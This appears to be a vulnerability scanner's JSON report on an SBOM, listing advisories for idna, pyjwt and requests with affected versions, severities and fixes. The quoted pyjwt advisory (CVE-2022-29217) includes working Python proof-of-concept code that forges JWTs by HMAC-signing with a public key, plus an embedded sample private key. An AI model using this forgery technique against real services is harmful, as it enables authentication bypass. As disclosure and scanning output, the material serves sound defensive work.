{
  "results": [
    {
      "source": {
        "path": "/home/ooe/sbom_scanning/data_1716484155/sbom_files/kecwwtbnpwx1gc10uutv.json",
        "type": "sbom"
      },
      "packages": [
        {
          "package": {
            "name": "idna",
            "version": "3.6",
            "ecosystem": "PyPI"
          },
          "vulnerabilities": [
            {
              "modified": "2024-04-11T21:56:51Z",
              "published": "2024-04-11T21:32:40Z",
              "schema_version": "1.6.0",
              "id": "GHSA-jjg7-2v4v-x38h",
              "aliases": [
                "CVE-2024-3651"
              ],
              "summary": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode",
              "details": "### Impact\nA specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.\n\n### Patches\nThe function has been refined to reject such strings without the associated resource consumption in version 3.7.\n\n### Workarounds\nDomain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.\n\n### References\n* https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "idna",
                    "purl": "pkg:pypi/idna"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "3.7"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.1",
                    "0.2",
                    "0.3",
                    "0.4",
                    "0.5",
                    "0.6",
                    "0.7",
                    "0.8",
                    "0.9",
                    "1.0",
                    "1.1",
                    "2.0",
                    "2.1",
                    "2.10",
                    "2.2",
                    "2.3",
                    "2.4",
                    "2.5",
                    "2.6",
                    "2.7",
                    "2.8",
                    "2.9",
                    "3.0",
                    "3.1",
                    "3.2",
                    "3.3",
                    "3.4",
                    "3.5",
                    "3.6"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-jjg7-2v4v-x38h/GHSA-jjg7-2v4v-x38h.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/kjd/idna"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-400"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-04-11T21:32:40Z",
                "nvd_published_at": null,
                "severity": "MODERATE"
              }
            }
          ],
          "groups": [
            {
              "ids": [
                "GHSA-jjg7-2v4v-x38h"
              ],
              "aliases": [
                "CVE-2024-3651",
                "GHSA-jjg7-2v4v-x38h"
              ],
              "max_severity": "6.2"
            }
          ]
        },
        {
          "package": {
            "name": "pyjwt",
            "version": "1.7.1",
            "ecosystem": "PyPI"
          },
          "vulnerabilities": [
            {
              "modified": "2024-02-21T05:32:19Z",
              "published": "2022-05-24T22:17:27Z",
              "schema_version": "1.6.0",
              "id": "GHSA-ffqj-6fqr-9h24",
              "aliases": [
                "CVE-2022-29217",
                "PYSEC-2022-202"
              ],
              "summary": "Key confusion through non-blocklisted public key formats",
              "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nDisclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).\n\n\u003e PyJWT supports multiple different JWT signing algorithms. With JWT, an \n\u003e attacker submitting the JWT token can choose the used signing algorithm.\n\u003e \n\u003e The PyJWT library requires that the application chooses what algorithms \n\u003e are supported. The application can specify \n\u003e \"jwt.algorithms.get_default_algorithms()\" to get support for all \n\u003e algorithms. They can also specify a single one of them (which is the \n\u003e usual use case if calling jwt.decode directly. However, if calling \n\u003e jwt.decode in a helper function, all algorithms might be enabled.)\n\u003e \n\u003e For example, if the user chooses \"none\" algorithm and the JWT checker \n\u003e supports that, there will be no signature checking. This is a common \n\u003e security issue with some JWT implementations.\n\u003e \n\u003e PyJWT combats this by requiring that the if the \"none\" algorithm is \n\u003e used, the key has to be empty. As the key is given by the application \n\u003e running the checker, attacker cannot force \"none\" cipher to be used.\n\u003e \n\u003e Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is \n\u003e not a public key meant for asymmetric algorithm i.e. HMAC cannot be used \n\u003e if the key begins with \"ssh-rsa\". If HMAC is used with a public key, the \n\u003e attacker can just use the publicly known public key to sign the token \n\u003e and the checker would use the same key to verify.\n\u003e \n\u003e  From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. \n\u003e With ed25519, PyJWT supports public keys that start with \"ssh-\", for \n\u003e example \"ssh-ed25519\".\n\n```python\nimport jwt\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ed25519\n\n# Generate ed25519 private key\nprivate_key = ed25519.Ed25519PrivateKey.generate()\n\n# Get private key bytes as they would be stored in a file\npriv_key_bytes = \nprivate_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, \nencryption_algorithm=serialization.NoEncryption())\n\n# Get public key bytes as they would be stored in a file\npub_key_bytes = \nprivate_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)\n\n# Making a good jwt token that should work by signing it with the \nprivate key\nencoded_good = jwt.encode({\"test\": 1234}, priv_key_bytes, algorithm=\"EdDSA\")\n\n# Using HMAC with the public key to trick the receiver to think that the \npublic key is a HMAC secret\nencoded_bad = jwt.encode({\"test\": 1234}, pub_key_bytes, algorithm=\"HS256\")\n\n# Both of the jwt tokens are validated as valid\ndecoded_good = jwt.decode(encoded_good, pub_key_bytes, \nalgorithms=jwt.algorithms.get_default_algorithms())\ndecoded_bad = jwt.decode(encoded_bad, pub_key_bytes, \nalgorithms=jwt.algorithms.get_default_algorithms())\n\nif decoded_good == decoded_bad:\n     print(\"POC Successfull\")\n\n# Of course the receiver should specify ed25519 algorithm to be used if \nthey specify ed25519 public key. However, if other algorithms are used, \nthe POC does not work\n# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py\n#\n#        invalid_strings = [\n#            b\"-----BEGIN PUBLIC KEY-----\",\n#            b\"-----BEGIN CERTIFICATE-----\",\n#            b\"-----BEGIN RSA PUBLIC KEY-----\",\n#            b\"ssh-rsa\",\n#        ]\n#\n# However, OKPAlgorithm (ed25519) accepts the following in \njwt/algorithms.py:\n#\n#                if \"-----BEGIN PUBLIC\" in str_key:\n#                    return load_pem_public_key(key)\n#                if \"-----BEGIN PRIVATE\" in str_key:\n#                    return load_pem_private_key(key, password=None)\n#                if str_key[0:4] == \"ssh-\":\n#                    return load_ssh_public_key(key)\n#\n# These should most likely made to match each other to prevent this behavior\n```\n\n\n```python\nimport jwt\n\n#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem\n#openssl ec -in ec256-key-priv.pem -pubout \u003e ec256-key-pub.pem\n#ssh-keygen -y -f ec256-key-priv.pem \u003e ec256-key-ssh.pub\n\npriv_key_bytes = b\"\"\"-----BEGIN EC PRIVATE KEY-----\nMHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49\nAwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk\nAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==\n-----END EC PRIVATE KEY-----\"\"\"\n\npub_key_bytes = b\"\"\"-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL\nZr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==\n-----END PUBLIC KEY-----\"\"\"\n\nssh_key_bytes = b\"\"\"ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc=\"\"\"\n\n# Making a good jwt token that should work by signing it with the private key\nencoded_good = jwt.encode({\"test\": 1234}, priv_key_bytes, algorithm=\"ES256\")\n\n# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret\nencoded_bad = jwt.encode({\"test\": 1234}, ssh_key_bytes, algorithm=\"HS256\")\n\n# Both of the jwt tokens are validated as valid\ndecoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())\ndecoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())\n\nif decoded_good == decoded_bad:\n    print(\"POC Successfull\")\nelse:\n    print(\"POC Failed\")\n```\n\n\u003e The issue is not that big as \n\u003e algorithms=jwt.algorithms.get_default_algorithms() has to be used. \n\u003e However, with quick googling, this seems to be used in some cases at \n\u003e least in some minor projects.\n\n### Patches\n\nUsers should upgrade to v2.4.0.\n\n### Workarounds\n\nAlways be explicit with the algorithms that are accepted and expected when decoding.\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/jpadilla/pyjwt\n* Email José Padilla: pyjwt at jpadilla dot com\n",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "pyjwt",
                    "purl": "pkg:pypi/pyjwt"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "1.5.0"
                        },
                        {
                          "fixed": "2.4.0"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "1.5.0",
                    "1.5.1",
                    "1.5.2",
                    "1.5.3",
                    "1.6.0",
                    "1.6.1",
                    "1.6.3",
                    "1.6.4",
                    "1.7.0",
                    "1.7.1",
                    "2.0.0",
                    "2.0.0a1",
                    "2.0.0a2",
                    "2.0.1",
                    "2.1.0",
                    "2.2.0",
                    "2.3.0"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-ffqj-6fqr-9h24/GHSA-ffqj-6fqr-9h24.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29217"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/jpadilla/pyjwt"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2022-202.yaml"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-327"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2022-05-24T22:17:27Z",
                "nvd_published_at": "2022-05-24T15:15:00Z",
                "severity": "HIGH"
              }
            },
            {
              "modified": "2023-11-08T04:09:10Z",
              "published": "2022-05-24T15:15:00Z",
              "schema_version": "1.6.0",
              "id": "PYSEC-2022-202",
              "aliases": [
                "CVE-2022-29217",
                "GHSA-ffqj-6fqr-9h24"
              ],
              "details": "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "pyjwt",
                    "purl": "pkg:pypi/pyjwt"
                  },
                  "ranges": [
                    {
                      "type": "GIT",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "9c528670c455b8d948aff95ed50e22940d1ad3fc"
                        }
                      ],
                      "repo": "https://github.com/jpadilla/pyjwt"
                    },
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "1.5.0"
                        },
                        {
                          "fixed": "2.4.0"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "1.5.0",
                    "1.5.1",
                    "1.5.2",
                    "1.5.3",
                    "1.6.0",
                    "1.6.1",
                    "1.6.3",
                    "1.6.4",
                    "1.7.0",
                    "1.7.1",
                    "2.0.0",
                    "2.0.0a1",
                    "2.0.0a2",
                    "2.0.1",
                    "2.1.0",
                    "2.2.0",
                    "2.3.0"
                  ],
                  "database_specific": {
                    "source": "https://github.com/pypa/advisory-database/blob/main/vulns/pyjwt/PYSEC-2022-202.yaml"
                  }
                }
              ],
              "references": [
                {
                  "type": "ADVISORY",
                  "url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24"
                },
                {
                  "type": "FIX",
                  "url": "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/"
                }
              ]
            }
          ],
          "groups": [
            {
              "ids": [
                "GHSA-ffqj-6fqr-9h24",
                "PYSEC-2022-202"
              ],
              "aliases": [
                "CVE-2022-29217",
                "GHSA-ffqj-6fqr-9h24",
                "PYSEC-2022-202"
              ],
              "max_severity": "7.4"
            }
          ]
        },
        {
          "package": {
            "name": "requests",
            "version": "2.31.0",
            "ecosystem": "PyPI"
          },
          "vulnerabilities": [
            {
              "modified": "2024-05-20T22:16:05Z",
              "published": "2024-05-20T20:15:00Z",
              "schema_version": "1.6.0",
              "id": "GHSA-9wx4-h78v-vm56",
              "aliases": [
                "CVE-2024-35195"
              ],
              "summary": "Requests `Session` object does not verify requests after making first request with verify=False",
              "details": "When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool.\n\n### Remediation\nAny of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation.\n\n* Upgrade to `requests\u003e=2.32.0`.\n* For `requests\u003c2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session.\n* For `requests\u003c2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used.\n\n### Related Links\n* https://github.com/psf/requests/pull/6655",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "requests",
                    "purl": "pkg:pypi/requests"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "2.32.0"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.0.1",
                    "0.10.0",
                    "0.10.1",
                    "0.10.2",
                    "0.10.3",
                    "0.10.4",
                    "0.10.6",
                    "0.10.7",
                    "0.10.8",
                    "0.11.1",
                    "0.11.2",
                    "0.12.0",
                    "0.12.01",
                    "0.12.1",
                    "0.13.0",
                    "0.13.1",
                    "0.13.2",
                    "0.13.3",
                    "0.13.4",
                    "0.13.5",
                    "0.13.6",
                    "0.13.7",
                    "0.13.8",
                    "0.13.9",
                    "0.14.0",
                    "0.14.1",
                    "0.14.2",
                    "0.2.0",
                    "0.2.1",
                    "0.2.2",
                    "0.2.3",
                    "0.2.4",
                    "0.3.0",
                    "0.3.1",
                    "0.3.2",
                    "0.3.3",
                    "0.3.4",
                    "0.4.0",
                    "0.4.1",
                    "0.5.0",
                    "0.5.1",
                    "0.6.0",
                    "0.6.1",
                    "0.6.2",
                    "0.6.3",
                    "0.6.4",
                    "0.6.5",
                    "0.6.6",
                    "0.7.0",
                    "0.7.1",
                    "0.7.2",
                    "0.7.3",
                    "0.7.4",
                    "0.7.5",
                    "0.7.6",
                    "0.8.0",
                    "0.8.1",
                    "0.8.2",
                    "0.8.3",
                    "0.8.4",
                    "0.8.5",
                    "0.8.6",
                    "0.8.7",
                    "0.8.8",
                    "0.8.9",
                    "0.9.0",
                    "0.9.1",
                    "0.9.2",
                    "0.9.3",
                    "1.0.0",
                    "1.0.1",
                    "1.0.2",
                    "1.0.3",
                    "1.0.4",
                    "1.1.0",
                    "1.2.0",
                    "1.2.1",
                    "1.2.2",
                    "1.2.3",
                    "2.0.0",
                    "2.0.1",
                    "2.1.0",
                    "2.10.0",
                    "2.11.0",
                    "2.11.1",
                    "2.12.0",
                    "2.12.1",
                    "2.12.2",
                    "2.12.3",
                    "2.12.4",
                    "2.12.5",
                    "2.13.0",
                    "2.14.0",
                    "2.14.1",
                    "2.14.2",
                    "2.15.0",
                    "2.15.1",
                    "2.16.0",
                    "2.16.1",
                    "2.16.2",
                    "2.16.3",
                    "2.16.4",
                    "2.16.5",
                    "2.17.0",
                    "2.17.1",
                    "2.17.2",
                    "2.17.3",
                    "2.18.0",
                    "2.18.1",
                    "2.18.2",
                    "2.18.3",
                    "2.18.4",
                    "2.19.0",
                    "2.19.1",
                    "2.2.0",
                    "2.2.1",
                    "2.20.0",
                    "2.20.1",
                    "2.21.0",
                    "2.22.0",
                    "2.23.0",
                    "2.24.0",
                    "2.25.0",
                    "2.25.1",
                    "2.26.0",
                    "2.27.0",
                    "2.27.1",
                    "2.28.0",
                    "2.28.1",
                    "2.28.2",
                    "2.29.0",
                    "2.3.0",
                    "2.30.0",
                    "2.31.0",
                    "2.4.0",
                    "2.4.1",
                    "2.4.2",
                    "2.4.3",
                    "2.5.0",
                    "2.5.1",
                    "2.5.2",
                    "2.5.3",
                    "2.6.0",
                    "2.6.1",
                    "2.6.2",
                    "2.7.0",
                    "2.8.0",
                    "2.8.1",
                    "2.9.0",
                    "2.9.1",
                    "2.9.2"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-9wx4-h78v-vm56/GHSA-9wx4-h78v-vm56.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/psf/requests/pull/6655"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/psf/requests/commit/a58d7f2ffb4d00b46dca2d70a3932a0b37e22fac"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/psf/requests"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-670"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-05-20T20:15:00Z",
                "nvd_published_at": "2024-05-20T21:15:09Z",
                "severity": "MODERATE"
              }
            }
          ],
          "groups": [
            {
              "ids": [
                "GHSA-9wx4-h78v-vm56"
              ],
              "aliases": [
                "CVE-2024-35195",
                "GHSA-9wx4-h78v-vm56"
              ],
              "max_severity": "5.6"
            }
          ]
        }
      ]
    }
  ],
  "experimental_config": {
    "licenses": {
      "summary": false,
      "allowlist": null
    }
  }
}
